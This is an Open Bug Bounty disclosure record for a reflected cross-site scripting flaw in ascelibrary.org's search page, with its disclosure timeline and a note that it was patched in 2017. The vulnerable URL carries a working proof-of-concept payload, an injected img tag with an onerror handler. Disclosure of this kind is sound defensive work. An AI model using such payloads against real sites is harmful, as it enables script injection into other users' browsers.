ascelibrary.org XSS vulnerability

2015-02-15T09:52:00
ID OBB:54512
Type openbugbounty
Reporter en4rab
Modified 2017-11-21T20:50:00

Description

Vulnerable URL:
http://ascelibrary.org/action/doSearch?displaySummary=true&target=default&text1=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%27XSSPOSED%27%29%3E&field1=AllField&logicalOpe1=AND&text2=&field2=AllField&logicalOpe2=AND&text3=&field3=AllField&logicalOpe3=AND&text4=&field4=AllField&logicalOpe4=AND&text5=&field5=AllField&logicalOpe5=AND&text6=&field6=AllField&logicalOpe6=AND&text7=&field7=AllField&publication=&AfterMonth=&AfterYear=&BeforeMonth=&BeforeYear=
Details:

Description| Value
---|---
Patched:| Yes, at 21.11.2017
Latest check for patch:| 21.11.2017 20:50 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 59658
Google Pagerank| 8
VIP website status:| Yes
Check ascelibrary.org SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 15 February, 2015 09:52 GMT
Vulnerability existence verified and confirmed| 17 February, 2015 18:56 GMT
Vulnerability patched by the website owner| 21 November, 2017 20:50 GMT